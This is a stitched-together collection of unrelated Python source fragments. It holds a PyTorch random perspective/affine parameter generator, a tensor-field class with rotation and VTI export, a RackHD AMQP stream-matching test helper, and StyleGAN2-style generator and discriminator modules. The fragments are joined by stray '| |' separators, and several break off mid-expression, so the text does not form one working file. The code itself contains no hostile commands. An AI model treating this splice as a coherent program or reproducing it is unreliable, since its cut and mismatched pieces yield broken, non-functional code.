width (int): width of the image.
distortion_scale (torch.Tensor): it controls the degree of distortion and ranges from 0 to 1.
same_on_batch (bool): apply the same transformation across the batch. Default: False.
device (torch.device): the device on which the random numbers will be generated. Default: cpu.
dtype (torch.dtype): the data type of the generated random numbers. Default: float32.
Returns:
params Dict[str, torch.Tensor]: parameters to be passed for transformation.
- start_points (torch.Tensor): element-wise perspective source areas with a shape of (B, 4, 2).
- end_points (torch.Tensor): element-wise perspective target areas with a shape of (B, 4, 2).
Note:
The generated random numbers are not reproducible across different devices and dtypes.
"""
_common_param_check(batch_size, same_on_batch)
assert (
distortion_scale.dim() == 0 and 0 <= distortion_scale <= 1
), f"'distortion_scale' must be a scalar within [0, 1]. Got {distortion_scale}."
assert (
type(height) is int and height > 0 and type(width) is int and width > 0
), f"'height' and 'width' must be integers. Got {height}, {width}."
start_points: torch.Tensor = torch.tensor(
[[[0.0, 0], [width - 1, 0], [width - 1, height - 1], [0, height - 1]]],
device=distortion_scale.device,
dtype=distortion_scale.dtype,
).expand(batch_size, -1, -1)
# generate random offset not larger than half of the image
fx = distortion_scale * width / 2
fy = distortion_scale * height / 2
factor = torch.stack([fx, fy], dim=0).view(-1, 1, 2)
# TODO: This line somehow breaks the gradcheck
rand_val: torch.Tensor = _adapted_uniform(
start_points.shape,
torch.tensor(0, device=device, dtype=dtype),
torch.tensor(1, device=device, dtype=dtype),
same_on_batch,
).to(device=distortion_scale.device, dtype=distortion_scale.dtype)
pts_norm = torch.tensor(
[[[1, 1], [-1, 1], [-1, -1], [1, -1]]], device=distortion_scale.device, dtype=distortion_scale.dtype
)
end_points = start_points + factor * rand_val * pts_norm
return dict(start_points=start_points, end_points=end_points)
def random_affine_generator(
batch_size: int,
height: int,
width: int,
degrees: torch.Tensor,
translate: Optional[torch.Tensor] = None,
scale: Optional[torch.Tensor] = None,
shear: Optional[torch.Tensor] = None,
same_on_batch: bool = False,
device: torch.device = torch.device('cpu'),
dtype: torch.dtype = torch.float32,
) -> Dict[str, torch.Tensor]:
r"""Get parameters for ``affine`` for a random affine transform.
Args:
batch_size (int): the tensor batch size.
height (int) : height of the image.
width (int): width of the image.
degrees (torch.Tensor): Range of degrees to select from like (min, max).
translate (tensor, optional): tuple of maximum absolute fraction for horizontal
and vertical translations. For example translate=(a, b), then horizontal shift
is randomly sampled in the range -img_width * a < dx < img_width * a and vertical shift is
randomly sampled in the range -img_height * b < dy < img_height * b. Will not translate by default.
scale (tensor, optional): scaling factor interval, e.g (a, b), then scale is
randomly sampled from the range a <= scale <= b. Will keep original scale by default.
shear (tensor, optional): Range of degrees to select from.
Shear is a 2x2 tensor, a x-axis shear in (shear[0][0], shear[0][1]) and y-axis shear in
(shear[1][0], shear[1][1]) will be applied. Will not apply shear by default.
same_on_batch (bool): apply the same transformation across the batch. Default: False.
device (torch.device): the device on which the random numbers will be generated. Default: cpu.
dtype (torch.dtype): the data type of the generated random numbers. Default: float32.
Returns:
params Dict[str, torch.Tensor]: parameters to be passed for transformation.
- translations (torch.Tensor): element-wise translations with a shape of (B, 2).
- center (torch.Tensor): element-wise center with a shape of (B, 2).
- scale (torch.Tensor): element-wise scales with a shape of (B, 2).
- angle (torch.Tensor): element-wise rotation angles with a shape of (B,).
- sx (torch.Tensor): element-wise x-axis shears with a shape of (B,).
- sy (torch.Tensor): element-wise y-axis shears with a shape of (B,).
Note:
The generated random numbers are not reproducible across different devices and dtypes.
"""
_common_param_check(batch_size, same_on_batch)
_joint_range_check(degrees, "degrees")
assert (
isinstance(width, (int,)) and isinstance(height, (int,)) and width > 0 and height > 0
), f"`width` and `height` must be positive integers. Got {width}, {height}."
_device, _dtype = _extract_device_dtype([degrees, translate, scale, shear])
degrees = degrees.to(device=device, dtype=dtype)
angle = _adapted_uniform((batch_size,), degrees[0], degrees[1], same_on_batch)
angle = angle.to(device=_device, dtype=_dtype)
# compute tensor ranges
if scale | |
[flip_ax]
if self._Nv==6:
negate_comps = [5-ax,3+(4-ax)%3]
else:
raise Exception("Could not parse axis.")
print("{ 90 deg rotation around axis "+axis[-1]+" }")
if self._mask_vals is not None:
raise Exception("You should always call set_mask after rotate_90deg")
# mapping for the axis order in the raw data array (axis 3 is field component axis)
ax_map = [2, 1, 0, 3]
# permutation of axes and components equivalent to the rotation operation
permut_ax = np.arange(0,4)
permut_ax[ax_map[(ax+1)%3]] = ax_map[(ax+2)%3]
permut_ax[ax_map[(ax+2)%3]] = ax_map[(ax+1)%3]
permut_comp = np.arange(0,self._Nv)
permut_comp[(ax+1)%3] = (ax+2)%3
permut_comp[(ax+2)%3] = (ax+1)%3
if self._Nv==6:
permut_comp[3+(3-ax)%3] = 3+(4-ax)%3
permut_comp[3+(4-ax)%3] = 3+(3-ax)%3
# We apply the axis and component permutations, followed by component negations
self._vals = np.flip(
np.transpose(self.vals, tuple(permut_ax)),
axis = ax_map[flip_ax])[:,:,:,permut_comp]
for comp in negate_comps:
self._vals[:,:,:,comp] = -self._vals[:,:,:,comp]
(self._Nx, self._Ny, self._Nz) = tuple(
self.get_mesh_dimensions()[i] for i in permut_comp[0:3])
(self._Lx, self._Ly, self._Lz) = tuple(
self.get_mesh_lengths()[i] for i in permut_comp[0:3])
(self._dx, self._dy, self._dz) = tuple(
self.get_mesh_spacings()[i] for i in permut_comp[0:3])
def rotate_180deg(self, axis):
"""
Apply a solid rotation of the tensor field of 180 degrees around the specified axis.
This is a lossless operation which does not rely on interpolation.
Parameters
----------
axis : str
Axis around which to perform the rotation. Need to be under the form 'A' where
'A'='x', 'y' or 'z' defines the rotation axis.
"""
if axis[0]=="x":
ax = 0
elif axis[0]=="y":
ax = 1
elif axis[0]=="z":
ax = 2
else:
raise Exception("Could not parse axis.")
print("{ 180 deg rotation around axis "+axis[-1]+" }")
if self._mask_vals is not None:
raise Exception("You should always call set_mask after rotate_180deg")
# mapping for the axis order in the raw data array (axis 3 is component axis)
ax_map = np.array([2, 1, 0, 3])
# Axes that will be flipped and components that will be reversed after rotation
flip_axes = [(ax+1)%3, (ax+2)%3]
if self._Nv==3:
negate_comps = flip_axes
if self._Nv==6:
negate_comps = [3+(3-ax)%3, 3+(4-ax)%3]
# We apply the rotation
self._vals = np.flip(self.vals, axis = tuple(ax_map[flip_axes]))
for comp in negate_comps:
self._vals[:,:,:,comp] = -self._vals[:,:,:,comp]
def rotate(self, axis, angle, fill_value=None):
"""
Apply a solid rotation of the tensor field of an arbitrary angle around the
specified axis. This is a lossy operation that will rely on interpolation, so
possible artefacts can appear if the tensor field data is not smooth enough.
Parameters
----------
axis : str
Axis around which to perform the rotation. Need to be under the form 'A' where
'A'='x', 'y' or 'z' defines the rotation axis.
angle : float
Angle of rotation in degrees.
"""
if axis[0]=="x":
ax = 0
elif axis[0]=="y":
ax = 1
elif axis[0]=="z":
ax = 2
else:
raise Exception("Could not parse axis.")
print("{ Rotation of %.2f° around axis %s }" % (angle,axis[0]))
if self._mask_vals is not None:
raise Exception("You should always call 'set_mask' after 'rotate', not before")
u = np.zeros(3)
u[ax] = 1
rot_mat_inv = R.from_rotvec(-angle*np.pi/180*u).as_dcm()
# For vector field, the transformation operator is simply the rotation matrix. For
# symmetric second-order tensor field, the transformation operator can be obtained
# in Mathematica with appropriate cartesian product and slicing operations (which we
# compact based on roll and flip matrix operations)
if self._Nv==3:
transf_op = R.from_rotvec(angle*np.pi/180*u).as_dcm()
if self._Nv==6:
G = R.from_rotvec(angle*np.pi/180*u).as_dcm()
transf_op = np.zeros((6,6))
transf_op[0:3,0:3] = np.power(G,2)
transf_op[0:3,3:6] = 2*np.flip(np.roll(G,1,axis=1)*np.roll(G,2,axis=1),axis=1)
transf_op[3:6,0:3] = np.flip(np.roll(G,1,axis=0)*np.roll(G,2,axis=0),axis=0)
transf_op[3:6,3:6] = np.flip(
np.roll(np.roll(G,1,axis=1),2,axis=0)*np.roll(np.roll(G,2,axis=1),1,axis=0)+
np.roll(np.roll(G,1,axis=1),1,axis=0)*np.roll(np.roll(G,2,axis=1),2,axis=0))
x = np.linspace(-self._Lx/2, self._Lx/2, self._Nx)
y = np.linspace(-self._Ly/2, self._Ly/2, self._Ny)
z = np.linspace(-self._Lz/2, self._Lz/2, self._Nz)
Z,Y,X = np.meshgrid(z,y,x,indexing="ij")
pos = np.stack((X.flatten(),Y.flatten(),Z.flatten()), axis=1)
pos_rot = np.dot(rot_mat_inv,pos.transpose()).transpose()
tmp = interpn((z,y,x), self._vals, np.flip(pos_rot, axis=1),
bounds_error=False, fill_value=fill_value)
self._vals = np.dot(transf_op,tmp.transpose()).transpose().reshape(
(self._Nz,self._Ny,self._Nx,self._Nv))
def rescale_mesh(self, scaling_factor):
"""
Uniformly scale the mesh using the given scaling factor.
Parameters
----------
scaling_factor : factor
The mesh lengths and spacings will be multiplied by this factor.
"""
(self._Lx,self._Ly,self._Lz) = tuple(scaling_factor*np.array(self.get_mesh_lengths()))
(self._dx,self._dy,self._dz) = tuple(scaling_factor*np.array(self.get_mesh_spacings()))
@property
def vals(self):
"""Numpy array for the tensor values, of shape (Nz,Ny,Nx,Nv), where Nv=3 for a vector
field and Nv=6 for a symmetric second-order tensor field (we only store the
[xx,yy,zz,xy,xz,yz] components for efficiency reasons).
"""
return self._vals
@vals.setter
def vals(self, tensor_ndarray):
if self._vals.shape==tensor_ndarray.shape:
self._vals = tensor_ndarray
else:
raise Exception("Wrong shape for the tensor field ndarray")
def save_to_vti(self, file_name, array_name):
"""Save the tensor field inside a vti file.
Parameters
----------
file_name : string
Path to the exported vti file. The ".vti" extension is automatically appended,
no need to include it in this parameter (but in case you do only one extension
will be added).
array_name : string
Name of the vti array that will store the tensor field.
"""
if file_name[-4:]==".vti":
path = file_name
else:
path = file_name+".vti"
print("{ Saving tensor field to "+path+" }")
vti_data = vtkImageData()
vti_data.SetDimensions(self._Nx, self._Ny, self._Nz)
vti_data.SetOrigin(-self._Lx/2, -self._Ly/2, -self._Lz/2)
vti_data.SetSpacing(self._dx, self._dy, self._dz)
tensor_data = \
vn.numpy_to_vtk(self._vals.reshape((self._Nx*self._Ny*self._Nz,self._Nv)))
tensor_data.SetName(array_name)
vti_data.GetPointData().AddArray(tensor_data)
if self._mask_type is not None:
mask_data = vn.numpy_to_vtk(
self.mask_vals.reshape((self._Nx*self._Ny*self._Nz,1)))
mask_data.SetName("domain_mask")
vti_data.GetPointData().AddArray(mask_data)
writer = vtkXMLImageDataWriter()
writer.SetFileName(path)
writer.SetInputData(vti_data)
writer.Write()
def get_pos(self, ix, iy, iz):
"""Returns the spatial position associated with the mesh indices (ix,iy,iz)
It is assumed that the mesh is centered on the origin (0,0,0).
"""
return (ix*self._dx-self._Lx/2, iy*self._dy-self._Ly/2, iz*self._dz-self._Lz/2)
def get_mesh_dimensions(self):
"""Returns the dimensions (Nx,Ny,Nz) of the simulation mesh"""
return (self._Nx, self._Ny, self._Nz)
def get_mesh_lengths(self):
"""Returns the lengths (Lx,Ly,Lz) of the simulation mesh"""
return (self._Lx, self._Ly, self._Lz)
def get_mesh_spacings(self):
"""Returns the spacings (dx,dy,dz) of the simulation mesh"""
return (self._dx, self._dy, self._dz)
def get_n_vertices(self):
"""Returns the number of vertices in the simulation mesh"""
return self._Nx*self._Ny*self._Nz
class DirectorField(TensorField):
"""
A specialization of the TensorField class for director fields.
The two versions of the constructor of the parent class TensorField are simplified since
we do not need the parameters 'tensor_order' (always 1 for a director field) or
'vti_array' (assumed to be "n"):
.. code-block:: python
# First version of the constructor
nfield = DirectorField(
mesh_lengths=(Lx,Ly,Lz), mesh_dimensions=(Nx,Ny,Nz))
# Second version of the constructor
nfield = DirectorField(
vti_file="path to vti file", vti_array="name of tensor array")
In addition to all the methods of the parent class for initializing and manipulating
the field values, we specialize the "save_to_vti" method (imposing that the exported vti
array name is always "n") and provide additional methods for initializing the
director field values from theoretical functions, exporting a q-tensor field from the
director field, and normalizing the director field to unit norm.
"""
def __init__(self, **kwargs):
if "vti_file" in kwargs:
kwargs["vti_array"] = "n"
elif "mesh_lengths" in kwargs and "mesh_dimensions" in kwargs:
kwargs["tensor_order"] = 1
else:
raise Exception("Could not parse the constructor parameters of DirectorField")
super().__init__(**kwargs)
def init_from_funcs(self, nx_func, ny_func, nz_func):
"""Initialize the director field from three functions for each of its component. The
functions must depend on the space variables ``x``, ``y`` and ``z``. We recall that
the mesh is centered on the origin.
If the given functions are numpy-vectorizable, this function should be pretty fast. If
not, a warning will be printed and the faulty function(s) will be vectorized with the
numpy method ``vectorize`` (in which case you should expect a much slower execution
time).
"""
print("{ Calculating director values from user functions }")
zz, yy, xx = np.meshgrid(np.linspace(-self._Lz/2, self._Lz/2, self._Nz),
np.linspace(-self._Ly/2, self._Ly/2, self._Ny),
np.linspace(-self._Lx/2, self._Lx/2, self._Nx),
indexing="ij")
# We verify if the user functions are vectorizable
dummy_arr = np.ones((2,2,2))
try:
nx_func(dummy_arr,dummy_arr,dummy_arr)
except:
print("\tnx_func is not vectorized, using a non-optimized version instead.")
nx_func = np.vectorize(nx_func)
try:
ny_func(dummy_arr,dummy_arr,dummy_arr)
except:
print("\tny_func is not vectorized, using a non-optimized version instead.")
ny_func = np.vectorize(ny_func)
try:
nz_func(dummy_arr,dummy_arr,dummy_arr)
except:
print("\tnz_func is not vectorized, using a non-optimized version instead.")
nz_func = np.vectorize(nz_func)
self._vals = np.concatenate((np.expand_dims(nx_func(xx, yy, zz), axis=3),
np.expand_dims(ny_func(xx, yy, zz), axis=3),
np.expand_dims(nz_func(xx, yy, zz), axis=3)), 3)
def normalize(self):
"""Normalize the director field values to unit norm."""
print("{ Normalizing director values to 1 }")
norms = np.sqrt(np.sum(self._vals**2, axis=3, keepdims=True))
norms[norms==0] = 1
self._vals = self._vals / np.tile(norms, (1,1,1,3))
def get_qtensor_field(self):
"""Returns a QTensorField object equivalent to the director field represented by this
class, assuming a constant scalar order parameter (equal to | |
<reponame>arunrordell/RackHD
"""
Copyright (c) 2017 Dell Inc. or its subsidiaries. All Rights Reserved.
A set of super-simple matchers to use to self-test the matching framework.
"""
from gevent import monkey
monkey.patch_dns()
monkey.patch_time()
monkey.patch_builtins()
monkey.patch_select()
import re
import sys
import optparse
import uuid
import gevent
import gevent.queue
from pexpect import EOF
from datetime import datetime, timedelta
from .monitor_abc import StreamMonitorBaseClass
from .stream_matchers_base import StreamMatchBase
from .stream_matchers_results import StreamRunResults, MatcherValidationMissmatch, MatcherValidationMissingField
from .amqp_od import RackHDAMQPOnDemand
from .ssh_helper import SSHHelper
from kombu import Connection, Producer, Queue, Exchange, Consumer
class _KeyedConsumerHandler(object):
_keyed_consumers = {}
@classmethod
def get_keyed_consumer(cls, logs, connection, exchange, routing_key, queue_name, event_cb):
mname = "ex={} rk={} qn={}".format(exchange, routing_key, queue_name)
if mname not in cls._keyed_consumers:
new_one = _KeyedConsumerHandler(logs, connection, mname, exchange, routing_key, queue_name)
cls._keyed_consumers[mname] = new_one
cls._keyed_consumers[mname].add_new_event_handler(event_cb)
return cls._keyed_consumers[mname]
@classmethod
def test_helper_finalize_cleanup(cls):
cls._keyed_consumers = {}
def __init__(self, logs, connection, name, exchange, routing_key, queue_name):
self.__logs = logs
self.__ignore_some_stuff = False
self.name = name
self.__event_callbacks = []
if queue_name is None:
queue_name = ''
exclusive = True
else:
exclusive = False
chan = connection.channel()
ex = Exchange(exchange, 'topic', channel=chan)
queue = Queue(exchange=ex, routing_key=routing_key, exclusive=exclusive)
consumer = Consumer(chan, queues=[queue], callbacks=[self.__message_cb])
consumer.consume()
self.exchange = ex
def add_new_event_handler(self, event_cb):
self.__event_callbacks.append(event_cb)
def __message_cb(self, body, msg):
skip = False
if self.__ignore_some_stuff:
if "heartbeat" in msg.delivery_info['routing_key']:
skip = True
if msg.delivery_info['routing_key'].startswith('http'):
skip = True
if msg.delivery_info['routing_key'].startswith('polleralert'):
skip = True
if skip:
self.__logs.idl.debug_8('AMQP-SKIP=%s', msg.delivery_info['routing_key'])
msg.ack()
return
self.__logs.idl.debug_8(
'Inbound AMQP msg. %s (delivery_info=%s, content_type=%s, properties=%s, body=%s)',
msg, msg.delivery_info, msg.content_type, msg.properties, body)
for event_cb in self.__event_callbacks:
try:
event_cb(msg, body)
self.__logs.debug_8(' -- ran %s on msg', event_cb)
except Exception as proc_ex:
self.__logs.warning('exception while running %s on %s: %s', event_cb, msg, proc_ex)
msg.ack()
class _AMQPServerWrapper(object):
def __init__(self, amqp_url, logs):
self.__logs = logs
self.__amqp_url = amqp_url
self.__monitors = {}
self.__connection = Connection(self.__amqp_url)
self.__connection.connect()
self.__running = True
self.__consumer_gl = gevent.spawn(self.__consumer_greenlet_main)
self.__consumer_gl.greenlet_name = 'amqp-consumer-gl' # allowing flogging to print a nice name
gevent.sleep(0.0)
def __consumer_greenlet_main(self):
gevent.sleep(0)
while self.__running:
try:
self.__connection.drain_events(timeout=0.5)
except Exception as ex: # NOQA: assigned but not used (left in for super-duper-low-level-debug)
# print("was woken because {}".format(ex))
pass
gevent.sleep(0.1) # make -sure- to yield cpu...
# print("---loop")
def stop_greenlet(self):
self.__running = False
@property
def connected(self):
return self.__connection.connected
def create_add_tracker(self, exchange, routing_key, event_cb, queue_name=None):
self.__logs.irl.debug("AMQPServerWrapper: create_add_tracker ex=%s, rk=%s, event_cb=%s",
exchange, routing_key, event_cb)
mon = _KeyedConsumerHandler.get_keyed_consumer(
self.__logs, self.__connection, exchange, routing_key, queue_name, event_cb)
return mon.exchange
def inject(self, exchange, routing_key, payload):
self.__logs.irl.debug("Injecting a test AMQP message: ex=%s, rk=%s, payload=%s", exchange, routing_key, payload)
if not isinstance(exchange, Exchange):
exchange = Exchange(exchange, 'topic')
prod = Producer(self.__connection, exchange=exchange, routing_key=routing_key)
prod.publish(payload)
def test_helper_sync_send_msg(self, exchange, ex_rk, send_rk, payload):
ex = Exchange(exchange, 'topic')
queue = Queue(exchange=ex, routing_key=ex_rk + '.*', exclusive=True, channel=self.__connection)
queue.declare()
prod = Producer(self.__connection, exchange=ex, routing_key=send_rk)
prod.publish(payload)
return queue
def test_helper_sync_recv_msg(self, queue):
for tick in range(10):
msg = queue.get()
if msg is not None:
break
return msg
class _AMQPMatcher(StreamMatchBase):
"""
Implementation of a StreamMatchBase matcher.
"""
def __init__(self, logs, route_key, description, min=1, max=sys.maxint, validation_block=None, match_CB=None):
self.__route_key = route_key
self.__validation_block = validation_block
self.__match_CB = match_CB
if route_key is not None:
escaped_key = re.escape(route_key)
no_star = escaped_key.replace('*', '[^.]')
no_pound = no_star.replace('\#', '.*?')
self.__rk_regex = re.compile('^{}$'.format(no_pound))
self.__no_pound = no_pound
else:
self.__rk_regex = re.compile('.*')
super(_AMQPMatcher, self).__init__(logs, description, min=min, max=max)
def _match(self, other_event):
if self.__route_key is None:
return bool(other_event)
assert isinstance(other_event, _AMQPTrackerRecord), \
'other_event was a {} needs to be a {}'.format(type(other_event), _AMQPTrackerRecord)
m = self.__rk_regex.match(other_event.msg.delivery_info['routing_key'])
if m is None:
return False
if self.__match_CB is None:
return True
return self.__match_CB(other_event)
def _validate(self, other_event):
self._logs.idl.debug('validating event %s', other_event)
assert isinstance(other_event, _AMQPTrackerRecord), \
'other_event was a {} needs to be a {}'.format(type(other_event), _AMQPTrackerRecord)
if self.__validation_block is None:
return []
error_list = []
if 'routing_key' in self.__validation_block:
crk = self.__validation_block['routing_key']
ork = other_event.msg.delivery_info['routing_key']
if crk != ork:
self._logs.irl.debug(' Invalidated because rk %s does not match expected %s', ork, crk)
err = MatcherValidationMissmatch('msg.delivery_info', 'routing_key', crk, ork)
error_list.append(err)
if 'body' in self.__validation_block:
exp_body = self.__validation_block['body']
other_body = other_event.body
# todo: recursion
# todo: extra fields in other
for field_name, exp_value in exp_body.items():
if field_name not in other_body:
self._logs.irl.debug(" Invalidated because field %s not in event's fields %s", field_name,
other_body.keys())
err = MatcherValidationMissingField('body', field_name, exp_value)
error_list.append(err)
else:
# ok, it's there....
if exp_value == '<<present>>':
# that's good enough!
pass
elif exp_value != other_body[field_name]:
self._logs.irl.debug(" Invalidated because field %s value %s does not match expected %s",
field_name, other_body[field_name], exp_value)
err = MatcherValidationMissmatch('body', field_name, exp_value, other_body[field_name])
error_list.append(err)
pass
else:
pass
self._logs.irl.debug('Validation complete: error_list=%s', error_list)
return error_list
def dump(self, ofile=sys.stdout, indent=0):
super(_AMQPMatcher, self).dump(ofile=ofile, indent=indent)
ins = ' ' * indent
print >>ofile, "{0} route_key='{1}'".format(ins, self.__route_key)
class _AMQPProcessor(StreamMonitorBaseClass):
def __init__(self, logs, tracker, start_at=None, transient=True):
self._logs = logs
super(_AMQPProcessor, self).__init__()
self.handle_begin()
self.transient = transient
self.__tracker = tracker
self.__inbound_queue = gevent.queue.Queue()
self.__run_till = None
self.__tail_timeout = None
self.__in_finish_mode = False
self.__ignore_misses = False
# THIS is a hack to allow raw access to underlying tracker-records until we get a common
# validation phase. See get_raw_tracker_events() below for details
self.__matches_in_order = []
self.__started_at = tracker.add_processor(self, start_at=start_at)
self.__match_greenlet = gevent.spawn(self.__match_greenlet_run)
self.__match_greenlet.greenlet_name = 'processor-match-loop-gl'
def __match_greenlet_run(self):
self._logs.irl.debug('Starting to watch for events %s', self)
results = StreamRunResults()
tail_limit = None
loop_exit_why = None
noticed_change_to_finish = False
lcnt = 0
loop_slice = 0.1
five_s_mod = int(5 / loop_slice)
# Note: we want to move having it possible to NOT have to call
# start_finish before processing, but there are some icky glitches
# there I don't have time to hunt down. So, for now, just hang here
# until all the rules are set up.
while not self.__in_finish_mode:
gevent.sleep(0.1)
while (loop_exit_why is None) and (self.__run_till is None or self.__run_till > datetime.now()):
if lcnt % five_s_mod == 0:
if self.__run_till is None:
left = 'N/A'
else:
left = self.__run_till - datetime.now()
self._logs.irl.debug('Periodic loop: count=%d, run_till=%s, left=%s', lcnt, self.__run_till, left)
lcnt += 1
# we always want to setup tail_limit when we first cross over to finishing
if not noticed_change_to_finish and self.__in_finish_mode:
noticed_change_to_finish = True
self._logs.irl.debug(' Noticed that we shifted to finish-mode')
if tail_limit is None:
tail_limit = datetime.now() + self.__tail_timeout
self._logs.irl.debug(' and set tail-limit from none to %s', tail_limit)
try:
# timeout on peek call is needed to allow us to "notice" if our run-till
# or tail-time has been exceeded.
tracked = self.__inbound_queue.peek(timeout=loop_slice)
self._logs.idl.debug('%s peeked and got %s', self, tracked)
except gevent.queue.Empty:
tracked = None
if tracked is None:
# no message on queue.
if tail_limit is not None and datetime.now() > tail_limit:
self._logs.irl.debug(' hit tail limit during idle. Checking if end-check will work')
res = self._match_groups.check_ending()
self._logs.irl.debug(' check-res was %s, results-state=%s', res, 'results.dump(None)')
if res.is_empty:
self._logs.irl.debug(' and we can stop because processor in success state')
loop_exit_why = "tail-wait expired while processor in success state"
else:
# clear the tail-limit till another event hits us
self._logs.irl.debug(' and clearing tail-limit since we are not in success state: %s', res)
tail_limit = None
continue
res = self._match_groups.check_event(tracked, allow_complete_miss=self.__ignore_misses)
consume = False
if not res.is_empty:
consume = True
results.add_result(res)
self.__matches_in_order.append(tracked)
elif self.__ignore_misses:
# note: ignore_miss can only be set as we enter start-finish mode.
consume = True
if consume:
# remove consumed item from queue.
self.__inbound_queue.get()
if self.__tail_timeout is not None:
# we consumed a message, so bump out tail-limit
old_tail_limit = tail_limit
tail_limit = datetime.now() + self.__tail_timeout
self._logs.irl.debug(' consumed event. Bumping tail-limit from %s to %s', old_tail_limit, tail_limit)
if loop_exit_why is None:
loop_exit_why = "overall timeout occured"
self._logs.irl.debug('Periodic loop exit because %s count=%d, run_till=%s, now=%s',
loop_exit_why, lcnt, self.__run_till, datetime.now())
self._logs.irl.debug('---exiting loop because %s---: %s -> %s', loop_exit_why, self, results)
res = self._match_groups.check_ending()
results.add_result(res)
self._logs.irl.debug(' final results from %s is %s', self, results)
return results
def start_finish(self, timeout, tail_timeout=1.0, ignore_misses=True):
timeout = timedelta(seconds=timeout)
tail_timeout = timedelta(seconds=tail_timeout)
self._logs.irl.debug('start_finish on %s called. timeout=%s, tail-timeout=%s', self, timeout, tail_timeout)
self.__tail_timeout = tail_timeout
self.__run_till = datetime.now() + timeout + tail_timeout
self.__ignore_misses = ignore_misses
self.__in_finish_mode = True
return self.__match_greenlet
def process_tracked_record(self, tracked_record):
self._logs.irl.debug('Processing-tracked-record = %s', tracked_record)
self.__inbound_queue.put(tracked_record)
def match_any_event(self, description=None, min=1, max=1):
if description is None:
description = "match-any(rk={},min={},max={}".format(None, min, max)
m = _AMQPMatcher(self._logs, route_key=None, description=description, min=min, max=max)
self._add_matcher(m)
def match_on_routekey(self, description, routing_key=None, min=1, max=1, validation_block=None, match_CB=None):
if routing_key is None:
routing_key = '#'
description = "{}(rk={},min={},max={})".format(description, routing_key, min, max)
m = _AMQPMatcher(self._logs, route_key=routing_key, description=description, | |
depth, lr_mul = 0.1):
super().__init__()
layers = []
for i in range(depth):
layers.extend([EqualLinear(emb, emb, lr_mul), leaky_relu()])
self.net = nn.Sequential(*layers)
def forward(self, x):
x = F.normalize(x, dim=1)
return self.net(x)
class RGBBlock(nn.Module):
def __init__(self, latent_dim, input_channel, upsample, rgba = False):
super().__init__()
self.input_channel = input_channel
self.to_style = nn.Linear(latent_dim, input_channel)
out_filters = 3 if not rgba else 4
self.conv = Conv2DMod(input_channel, out_filters, 1, demod=False)
self.upsample = nn.Sequential(
nn.Upsample(scale_factor = 2, mode='bilinear', align_corners=False),
Blur()
) if upsample else None
def forward(self, x, prev_rgb, istyle):
b, c, h, w = x.shape
style = self.to_style(istyle)
x = self.conv(x, style)
if exists(prev_rgb):
x = x + prev_rgb
if exists(self.upsample):
x = self.upsample(x)
return x
class Conv2DMod(nn.Module):
def __init__(self, in_chan, out_chan, kernel, demod=True, stride=1, dilation=1, eps = 1e-8, **kwargs):
super().__init__()
self.filters = out_chan
self.demod = demod
self.kernel = kernel
self.stride = stride
self.dilation = dilation
self.weight = nn.Parameter(torch.randn((out_chan, in_chan, kernel, kernel)))
self.eps = eps
nn.init.kaiming_normal_(self.weight, a=0, mode='fan_in', nonlinearity='leaky_relu')
def _get_same_padding(self, size, kernel, dilation, stride):
return ((size - 1) * (stride - 1) + dilation * (kernel - 1)) // 2
def forward(self, x, y):
b, c, h, w = x.shape
w1 = y[:, None, :, None, None]
w2 = self.weight[None, :, :, :, :]
weights = w2 * (w1 + 1)
if self.demod:
d = torch.rsqrt((weights ** 2).sum(dim=(2, 3, 4), keepdim=True) + self.eps)
weights = weights * d
x = x.reshape(1, -1, h, w)
_, _, *ws = weights.shape
weights = weights.reshape(b * self.filters, *ws)
padding = self._get_same_padding(h, self.kernel, self.dilation, self.stride)
x = F.conv2d(x, weights, padding=padding, groups=b)
x = x.reshape(-1, self.filters, h, w)
return x
class GeneratorBlock(nn.Module):
def __init__(self, latent_dim, input_channels, filters, upsample = True, upsample_rgb = True, rgba = False):
super().__init__()
self.upsample = nn.Upsample(scale_factor=2, mode='bilinear', align_corners=False) if upsample else None
self.to_style1 = nn.Linear(latent_dim, input_channels)
self.to_noise1 = nn.Linear(1, filters)
self.conv1 = Conv2DMod(input_channels, filters, 3)
self.to_style2 = nn.Linear(latent_dim, filters)
self.to_noise2 = nn.Linear(1, filters)
self.conv2 = Conv2DMod(filters, filters, 3)
self.activation = leaky_relu()
self.to_rgb = RGBBlock(latent_dim, filters, upsample_rgb, rgba)
def forward(self, x, prev_rgb, istyle, inoise):
if exists(self.upsample):
x = self.upsample(x)
inoise = inoise[:, :x.shape[2], :x.shape[3], :]
noise1 = self.to_noise1(inoise).permute((0, 3, 2, 1))
noise2 = self.to_noise2(inoise).permute((0, 3, 2, 1))
style1 = self.to_style1(istyle)
x = self.conv1(x, style1)
x = self.activation(x + noise1)
style2 = self.to_style2(istyle)
x = self.conv2(x, style2)
x = self.activation(x + noise2)
rgb = self.to_rgb(x, prev_rgb, istyle)
return x, rgb
class DiscriminatorBlock(nn.Module):
def __init__(self, input_channels, filters, downsample=True):
super().__init__()
self.conv_res = nn.Conv2d(input_channels, filters, 1, stride = (2 if downsample else 1))
self.net = nn.Sequential(
nn.Conv2d(input_channels, filters, 3, padding=1),
leaky_relu(),
nn.Conv2d(filters, filters, 3, padding=1),
leaky_relu()
)
self.downsample = nn.Sequential(
Blur(),
nn.Conv2d(filters, filters, 3, padding = 1, stride = 2)
) if downsample else None
def forward(self, x):
res = self.conv_res(x)
x = self.net(x)
if exists(self.downsample):
x = self.downsample(x)
x = (x + res) * (1 / math.sqrt(2))
return x
class Generator(nn.Module):
def __init__(self, image_size, latent_dim, network_capacity = 16, transparent = False, attn_layers = [], no_const = False, fmap_max = 512):
super().__init__()
self.image_size = image_size
self.latent_dim = latent_dim
self.num_layers = int(log2(image_size) - 1)
filters = [network_capacity * (2 ** (i + 1)) for i in range(self.num_layers)][::-1]
set_fmap_max = partial(min, fmap_max)
filters = list(map(set_fmap_max, filters))
init_channels = filters[0]
filters = [init_channels, *filters]
in_out_pairs = zip(filters[:-1], filters[1:])
self.no_const = no_const
if no_const:
self.to_initial_block = nn.ConvTranspose2d(latent_dim, init_channels, 4, 1, 0, bias=False)
else:
self.initial_block = nn.Parameter(torch.randn((1, init_channels, 4, 4)))
self.initial_conv = nn.Conv2d(filters[0], filters[0], 3, padding=1)
self.blocks = nn.ModuleList([])
self.attns = nn.ModuleList([])
for ind, (in_chan, out_chan) in enumerate(in_out_pairs):
not_first = ind != 0
not_last = ind != (self.num_layers - 1)
num_layer = self.num_layers - ind
attn_fn = attn_and_ff(in_chan) if num_layer in attn_layers else None
self.attns.append(attn_fn)
block = GeneratorBlock(
latent_dim,
in_chan,
out_chan,
upsample = not_first,
upsample_rgb = not_last,
rgba = transparent
)
self.blocks.append(block)
